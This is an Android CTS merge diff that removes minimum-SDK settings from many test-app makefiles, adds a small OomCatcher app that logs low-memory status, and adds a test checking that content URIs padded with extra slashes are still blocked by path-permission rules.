[automerger skipped] Merge "Make EphemeralTest test apks target API 26" into stage-aosp-master
am: 39948f4274 -s ours
am skip reason: change_id Ib0fcd429463e36293f5c19f58b65ab2b76ffbed8 with SHA1 c7b91319c5 is in history
Change-Id: I39b614ab03c897ff6f88ac5d677747530c0125c0
diff --git a/apps/CtsVerifier/Android.mk b/apps/CtsVerifier/Android.mk
index 2bbf66c..98b95f4 100644
--- a/apps/CtsVerifier/Android.mk
+++ b/apps/CtsVerifier/Android.mk
@@ -81,7 +81,6 @@
LOCAL_MODULE := cts-verifier-framework
LOCAL_AAPT_FLAGS := --auto-add-overlay --extra-packages android.support.v4
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 19
LOCAL_RESOURCE_DIR := $(LOCAL_PATH)/res
LOCAL_SRC_FILES := \
$(call java-files-in, src/com/android/cts/verifier) \
diff --git a/apps/CtsVerifierUSBCompanion/Android.mk b/apps/CtsVerifierUSBCompanion/Android.mk
index c505b13..2e08142 100644
--- a/apps/CtsVerifierUSBCompanion/Android.mk
+++ b/apps/CtsVerifierUSBCompanion/Android.mk
@@ -28,7 +28,6 @@
LOCAL_PACKAGE_NAME := CtsVerifierUSBCompanion
LOCAL_SDK_VERSION := 25
-#LOCAL_MIN_SDK_VERSION := 12
LOCAL_DEX_PREOPT := false
diff --git a/apps/EmptyDeviceAdmin/Android.mk b/apps/EmptyDeviceAdmin/Android.mk
index ec4c4a3..1d68fbb 100644
--- a/apps/EmptyDeviceAdmin/Android.mk
+++ b/apps/EmptyDeviceAdmin/Android.mk
@@ -27,7 +27,6 @@
LOCAL_RESOURCE_DIR += $(LOCAL_PATH)/res
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 12
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/apps/EmptyDeviceOwner/Android.mk b/apps/EmptyDeviceOwner/Android.mk
index 0d85bb7..714e996 100644
--- a/apps/EmptyDeviceOwner/Android.mk
+++ b/apps/EmptyDeviceOwner/Android.mk
@@ -27,7 +27,6 @@
LOCAL_RESOURCE_DIR += $(LOCAL_PATH)/res
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 12
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/apps/NotificationBot/Android.mk b/apps/NotificationBot/Android.mk
index 8a89b1a..9d9c9f9 100644
--- a/apps/NotificationBot/Android.mk
+++ b/apps/NotificationBot/Android.mk
@@ -28,7 +28,6 @@
LOCAL_PROGUARD_FLAG_FILES := proguard.flags
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 19
LOCAL_DEX_PREOPT := false
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk b/apps/OomCatcher/Android.mk
similarity index 74%
rename from tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk
rename to apps/OomCatcher/Android.mk
index 512d6ac..7f47e03 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk
+++ b/apps/OomCatcher/Android.mk
@@ -1,3 +1,4 @@
+#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
@@ -12,20 +13,21 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
-LOCAL_PATH:= $(call my-dir)
+LOCAL_PATH:= $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
+LOCAL_MODULE_TAGS := optional
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
-LOCAL_PACKAGE_NAME := CtsVictimPermissionDefinerApp
+LOCAL_PACKAGE_NAME := OomCatcher
+LOCAL_SDK_VERSION := current
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
include $(BUILD_CTS_PACKAGE)
+
diff --git a/apps/OomCatcher/AndroidManifest.xml b/apps/OomCatcher/AndroidManifest.xml
new file mode 100644
index 0000000..25513e2
--- /dev/null
+++ b/apps/OomCatcher/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.oomcatcher"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application>
+ <activity android:name=".OomCatcher">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
diff --git a/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
new file mode 100644
index 0000000..32590b4
--- /dev/null
+++ b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
@@ -0,0 +1,113 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.android.cts.oomcatcher;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.app.ActivityManager;
+import android.content.Context;
+import android.content.ComponentCallbacks2;
+import android.util.Log;
+import java.util.concurrent.atomic.AtomicBoolean;
+
+/*
+ * An App to report to logcat the lowmemory status. As soon as the app detects low memory, it
+ * immediately reports. In addition, it also reports every second.
+ */
+public class OomCatcher extends Activity implements ComponentCallbacks2 {
+
+ private static final String LOG_TAG = "OomCatcher";
+
+ private AtomicBoolean isOom = new AtomicBoolean(false);
+
+ Thread logThread;
+
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ logThread = new Thread() {
+ @Override
+ public void run() {
+ while (true) {
+ logStatus();
+ try {
+ Thread.sleep(1000); // 1 second
+ } catch (InterruptedException e) {
+ // thread has been killed
+ }
+ }
+ }
+ };
+ logThread.setDaemon(true);
+ logThread.start();
+ }
+
+ public void onDestroy() {
+ if (logThread != null) {
+ logThread.interrupt();
+ }
+ }
+
+ /*
+ * Receive memory callbacks from the Android system. All report low memory except for
+ * TRIM_MEMORY_UI_HIDDEN, which reports when the app is in the background. We don't care about
+ * that, only when the device is at risk of OOMing.
+ *
+ * For all indications of low memory, onLowMemory() is called.
+ */
+ @Override
+ public void onTrimMemory(int level) {
+ Log.i(LOG_TAG, "Memory trim level: " + level);
+ switch (level) {
+ // background messages
+ case TRIM_MEMORY_MODERATE:
+ case TRIM_MEMORY_COMPLETE:
+ // foreground messages
+ case TRIM_MEMORY_RUNNING_LOW:
+ case TRIM_MEMORY_RUNNING_CRITICAL:
+ // fallthrough
+ onLowMemory();
+ break;
+ case TRIM_MEMORY_UI_HIDDEN:
+ Log.i(LOG_TAG, "UI is hidden because the app is in the background.");
+ break;
+ // lower priority messages being ignored
+ case TRIM_MEMORY_BACKGROUND:
+ case TRIM_MEMORY_RUNNING_MODERATE:
+ // fallthrough
+ Log.i(LOG_TAG, "ignoring low priority oom messages.");
+ break;
+ default:
+ Log.i(LOG_TAG, "unknown memory trim message.");
+ return;
+ }
+ }
+
+ /*
+ * An earlier API implementation of low memory callbacks. Sets oom status and logs.
+ */
+ @Override
+ public void onLowMemory() {
+ isOom.set(true);
+ logStatus();
+ }
+
+ /*
+ * Log to logcat the current lowmemory status of the app.
+ */
+ private void logStatus() {
+ Log.i(LOG_TAG, isOom.get() ? "Low memory" : "Normal memory");
+ }
+}
diff --git a/apps/PermissionApp/Android.mk b/apps/PermissionApp/Android.mk
index 026c803..cf4186d 100644
--- a/apps/PermissionApp/Android.mk
+++ b/apps/PermissionApp/Android.mk
@@ -27,7 +27,6 @@
LOCAL_PACKAGE_NAME := CtsPermissionApp
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 23
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/apps/VpnApp/api23/Android.mk b/apps/VpnApp/api23/Android.mk
index 67fbf6b..e25cb91 100755
--- a/apps/VpnApp/api23/Android.mk
+++ b/apps/VpnApp/api23/Android.mk
@@ -27,7 +27,6 @@
LOCAL_RESOURCE_DIR := $(LOCAL_PATH)/../res
#LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 22
LOCAL_PRIVATE_PLATFORM_APIS := true
# tag this module as a cts test artifact
diff --git a/apps/VpnApp/api24/Android.mk b/apps/VpnApp/api24/Android.mk
index 7d03f16..ec36333 100755
--- a/apps/VpnApp/api24/Android.mk
+++ b/apps/VpnApp/api24/Android.mk
@@ -27,7 +27,6 @@
LOCAL_RESOURCE_DIR := $(LOCAL_PATH)/../res
#LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 22
LOCAL_PRIVATE_PLATFORM_APIS := true
# tag this module as a cts test artifact
diff --git a/apps/VpnApp/latest/Android.mk b/apps/VpnApp/latest/Android.mk
index 317d8b0..0431bef 100755
--- a/apps/VpnApp/latest/Android.mk
+++ b/apps/VpnApp/latest/Android.mk
@@ -27,7 +27,6 @@
LOCAL_RESOURCE_DIR := $(LOCAL_PATH)/../res
#LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 22
LOCAL_PRIVATE_PLATFORM_APIS := true
# tag this module as a cts test artifact
diff --git a/apps/VpnApp/notalwayson/Android.mk b/apps/VpnApp/notalwayson/Android.mk
index 799056a..06731f8 100755
--- a/apps/VpnApp/notalwayson/Android.mk
+++ b/apps/VpnApp/notalwayson/Android.mk
@@ -27,7 +27,6 @@
LOCAL_RESOURCE_DIR := $(LOCAL_PATH)/../res
#LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 22
LOCAL_PRIVATE_PLATFORM_APIS := true
# tag this module as a cts test artifact
diff --git a/hostsidetests/appsecurity/test-apps/AccessSerialLegacy/Android.mk b/hostsidetests/appsecurity/test-apps/AccessSerialLegacy/Android.mk
index a85305d..bfb88f0 100644
--- a/hostsidetests/appsecurity/test-apps/AccessSerialLegacy/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/AccessSerialLegacy/Android.mk
@@ -26,7 +26,6 @@
LOCAL_PACKAGE_NAME := CtsAccessSerialLegacy
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 27
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/appsecurity/test-apps/AccessSerialModern/Android.mk b/hostsidetests/appsecurity/test-apps/AccessSerialModern/Android.mk
index dd24d5b..4bdb346 100644
--- a/hostsidetests/appsecurity/test-apps/AccessSerialModern/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/AccessSerialModern/Android.mk
@@ -27,7 +27,6 @@
LOCAL_PACKAGE_NAME := CtsAccessSerialModern
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 27
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/Android.mk b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/Android.mk
index eb8a172..90b7866 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/Android.mk
@@ -37,6 +37,4 @@
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
-LOCAL_MIN_SDK_VERSION := 25
-
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/AndroidManifest.xml
index ac9a6f7..2dc1b02 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp1/AndroidManifest.xml
@@ -18,7 +18,7 @@
package="com.android.cts.ephemeralapp1"
android:targetSandboxVersion="2">
<uses-sdk
- android:minSdkVersion="24" android:targetSdkVersion="26" />
+ android:minSdkVersion="25" />
<uses-permission android:name="com.android.alarm.permission.SET_ALARM" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/Android.mk b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/Android.mk
index d13d8a1..78c7970 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/Android.mk
@@ -33,7 +33,6 @@
LOCAL_PACKAGE_NAME := CtsEphemeralTestsEphemeralApp2
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 24
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/AndroidManifest.xml
index eba478e..0350cc6 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/EphemeralApp2/AndroidManifest.xml
@@ -18,7 +18,7 @@
package="com.android.cts.ephemeralapp2"
android:targetSandboxVersion="2">
<uses-sdk
- android:minSdkVersion="24" android:targetSdkVersion="26" />
+ android:minSdkVersion="24" />
<!-- TEST: exists only for testing ephemeral app1 can't see this app -->
<application
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/ImplicitlyExposedApp/Android.mk b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/ImplicitlyExposedApp/Android.mk
index b9089f0..8b04f9b 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/ImplicitlyExposedApp/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/ImplicitlyExposedApp/Android.mk
@@ -30,7 +30,6 @@
LOCAL_PACKAGE_NAME := CtsEphemeralTestsImplicitApp
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 24
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
diff --git a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/Android.mk b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/Android.mk
index 0246b88..d2c3667 100644
--- a/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/EphemeralTestApp/NormalApp/Android.mk
@@ -32,7 +32,6 @@
LOCAL_PACKAGE_NAME := CtsEphemeralTestsNormalApp
LOCAL_SDK_VERSION := system_current
-LOCAL_MIN_SDK_VERSION := 24
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
diff --git a/hostsidetests/appsecurity/test-apps/InstantUpgradeApp/Android.mk b/hostsidetests/appsecurity/test-apps/InstantUpgradeApp/Android.mk
index f4c51c9..e0bc1cf 100644
--- a/hostsidetests/appsecurity/test-apps/InstantUpgradeApp/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/InstantUpgradeApp/Android.mk
@@ -36,6 +36,4 @@
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
-LOCAL_MIN_SDK_VERSION := 25
-
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/PermissionPolicy25/Android.mk b/hostsidetests/appsecurity/test-apps/PermissionPolicy25/Android.mk
index c696530..a8d659b 100644
--- a/hostsidetests/appsecurity/test-apps/PermissionPolicy25/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/PermissionPolicy25/Android.mk
@@ -29,7 +29,6 @@
LOCAL_PACKAGE_NAME := CtsPermissionPolicyTest25
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 25
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionApp22/Android.mk b/hostsidetests/appsecurity/test-apps/UsePermissionApp22/Android.mk
index 3712956..7a62f09 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionApp22/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionApp22/Android.mk
@@ -43,6 +43,4 @@
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
-LOCAL_MIN_SDK_VERSION := 22
-
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionApp23/Android.mk b/hostsidetests/appsecurity/test-apps/UsePermissionApp23/Android.mk
index 648b387..58ee1c7 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionApp23/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionApp23/Android.mk
@@ -41,6 +41,4 @@
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
-LOCAL_MIN_SDK_VERSION := 23
-
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionApp25/Android.mk b/hostsidetests/appsecurity/test-apps/UsePermissionApp25/Android.mk
index 59e5f91..8528752 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionApp25/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionApp25/Android.mk
@@ -42,6 +42,4 @@
LOCAL_PROGUARD_ENABLED := disabled
LOCAL_DEX_PREOPT := false
-LOCAL_MIN_SDK_VERSION := 25
-
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionApp26/Android.mk b/hostsidetests/appsecurity/test-apps/UsePermissionApp26/Android.mk
index b0d8bd9..52c8ba4 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionApp26/Android.mk
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionApp26/Android.mk
@@ -32,7 +32,6 @@
LOCAL_PACKAGE_NAME := CtsUsePermissionApp26
LOCAL_PRIVATE_PLATFORM_APIS := true
-LOCAL_MIN_SDK_VERSION := 26
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
index f187504..355de8c 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
@@ -141,6 +141,16 @@
}
}
+ private void assertContentUriAllowed(Uri uri) {
+ assertReadingContentUriAllowed(uri);
+ assertWritingContentUriAllowed(uri);
+ }
+
+ private void assertContentUriNotAllowed(Uri uri, String msg) {
+ assertReadingContentUriNotAllowed(uri, msg);
+ assertWritingContentUriNotAllowed(uri, msg);
+ }
+
private void assertWritingContentUriNotAllowed(Uri uri, String msg) {
final ContentResolver resolver = getContext().getContentResolver();
try {
@@ -1170,6 +1180,26 @@
}
/**
+ * Test that shady {@link Uri} are blocked by {@code path-permission}.
+ */
+ public void testRestrictingProviderMatchingShadyPaths() {
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/"));
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting//"));
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting///"));
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting//foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting///foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/foo//baz"), null);
+ }
+
+ /**
* Verify that at least one {@code path-permission} rule will grant access,
* even if the caller doesn't hold another matching {@code path-permission}.
*/
diff --git a/hostsidetests/compilation/Android.mk b/hostsidetests/compilation/Android.mk
index 5a27baf..5047435 100644
--- a/hostsidetests/compilation/Android.mk
+++ b/hostsidetests/compilation/Android.mk
@@ -27,8 +27,6 @@
LOCAL_MODULE := CtsCompilationTestCases
-LOCAL_MIN_SDK_VERSION := 23
-
LOCAL_JAVA_LIBRARIES := cts-tradefed tradefed compatibility-host-util guava
include $(BUILD_HOST_JAVA_LIBRARY)
diff --git a/hostsidetests/devicepolicy/app/AccountCheck/Auth/Android.mk b/hostsidetests/devicepolicy/app/AccountCheck/Auth/Android.mk
index 22f3436..5746089 100644
--- a/hostsidetests/devicepolicy/app/AccountCheck/Auth/Android.mk
+++ b/hostsidetests/devicepolicy/app/AccountCheck/Auth/Android.mk
@@ -36,6 +36,5 @@
LOCAL_JAVA_LIBRARIES := android.test.base.stubs
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 25
include $(BUILD_CTS_PACKAGE)
diff --git a/hostsidetests/devicepolicy/app/AccountCheck/Tester/Android.mk b/hostsidetests/devicepolicy/app/AccountCheck/Tester/Android.mk
index 7706e73..b3adc70 100644
--- a/hostsidetests/devicepolicy/app/AccountCheck/Tester/Android.mk
+++ b/hostsidetests/devicepolicy/app/AccountCheck/Tester/Android.mk
@@ -30,6 +30,5 @@
LOCAL_STATIC_JAVA_LIBRARIES := androidx.legacy_legacy-support-v4 ctstestrunner ub-uiautomator android-support-test
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 25
include $(BUILD_CTS_PACKAGE)
diff --git a/hostsidetests/devicepolicy/app/AppRestrictionsTargetApp/Android.mk b/hostsidetests/devicepolicy/app/AppRestrictionsTargetApp/Android.mk
index 3aed12d..78795cf 100644
--- a/hostsidetests/devicepolicy/app/AppRestrictionsTargetApp/Android.mk
+++ b/hostsidetests/devicepolicy/app/AppRestrictionsTargetApp/Android.mk
@@ -25,7 +25,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src)
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 24
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/CertInstaller/Android.mk b/hostsidetests/devicepolicy/app/CertInstaller/Android.mk
index 18256f6..86440fc 100644
--- a/hostsidetests/devicepolicy/app/CertInstaller/Android.mk
+++ b/hostsidetests/devicepolicy/app/CertInstaller/Android.mk
@@ -27,7 +27,6 @@
LOCAL_JAVA_LIBRARIES := android.test.runner.stubs
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 22
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/CrossProfileAppsTest/Android.mk b/hostsidetests/devicepolicy/app/CrossProfileAppsTest/Android.mk
index 009a289..64034b9 100644
--- a/hostsidetests/devicepolicy/app/CrossProfileAppsTest/Android.mk
+++ b/hostsidetests/devicepolicy/app/CrossProfileAppsTest/Android.mk
@@ -34,7 +34,6 @@
ub-uiautomator
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 21
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/CustomizationApp/Android.mk b/hostsidetests/devicepolicy/app/CustomizationApp/Android.mk
index 2cea654..81d98f1 100644
--- a/hostsidetests/devicepolicy/app/CustomizationApp/Android.mk
+++ b/hostsidetests/devicepolicy/app/CustomizationApp/Android.mk
@@ -33,6 +33,5 @@
LOCAL_JAVA_LIBRARIES := android.test.base.stubs
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 24
include $(BUILD_CTS_PACKAGE)
diff --git a/hostsidetests/devicepolicy/app/DeviceAdmin/api23/Android.mk b/hostsidetests/devicepolicy/app/DeviceAdmin/api23/Android.mk
index 2d3a367..5cf7f05 100644
--- a/hostsidetests/devicepolicy/app/DeviceAdmin/api23/Android.mk
+++ b/hostsidetests/devicepolicy/app/DeviceAdmin/api23/Android.mk
@@ -33,7 +33,6 @@
LOCAL_JAVA_LIBRARIES := android.test.runner.stubs android.test.base.stubs
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 23
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/DeviceAdmin/api24/Android.mk b/hostsidetests/devicepolicy/app/DeviceAdmin/api24/Android.mk
index c19d0c0..a7c7470 100644
--- a/hostsidetests/devicepolicy/app/DeviceAdmin/api24/Android.mk
+++ b/hostsidetests/devicepolicy/app/DeviceAdmin/api24/Android.mk
@@ -33,7 +33,6 @@
LOCAL_JAVA_LIBRARIES := android.test.runner.stubs android.test.base.stubs
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 23
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/Android.mk b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/Android.mk
index 3c70869..1599d60 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/Android.mk
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/Android.mk
@@ -44,8 +44,6 @@
LOCAL_ASSET_DIR := $(LOCAL_PATH)/../assets
-LOCAL_MIN_SDK_VERSION := 23
-
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/Android.mk b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/Android.mk
index 68bef1b..481f821 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/Android.mk
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/Android.mk
@@ -44,8 +44,6 @@
LOCAL_ASSET_DIR := $(LOCAL_PATH)/../assets
-LOCAL_MIN_SDK_VERSION := 23
-
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/Android.mk b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/Android.mk
index 6a71be9..8c6d3fd 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/Android.mk
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/Android.mk
@@ -44,8 +44,6 @@
LOCAL_ASSET_DIR := $(LOCAL_PATH)/../assets
-LOCAL_MIN_SDK_VERSION := 23
-
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/DeviceOwner/Android.mk b/hostsidetests/devicepolicy/app/DeviceOwner/Android.mk
index ecf9dbf..a8e3b68 100644
--- a/hostsidetests/devicepolicy/app/DeviceOwner/Android.mk
+++ b/hostsidetests/devicepolicy/app/DeviceOwner/Android.mk
@@ -46,8 +46,6 @@
LOCAL_STATIC_ANDROID_LIBRARIES := \
androidx.legacy_legacy-support-v4
-LOCAL_MIN_SDK_VERSION := 20
-
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk b/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk
index bb2393c..60395c2 100644
--- a/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk
+++ b/hostsidetests/devicepolicy/app/IntentReceiver/Android.mk
@@ -31,7 +31,6 @@
ctstestrunner
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 19
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/IntentSender/Android.mk b/hostsidetests/devicepolicy/app/IntentSender/Android.mk
index 1551bea..5cc3b7a 100644
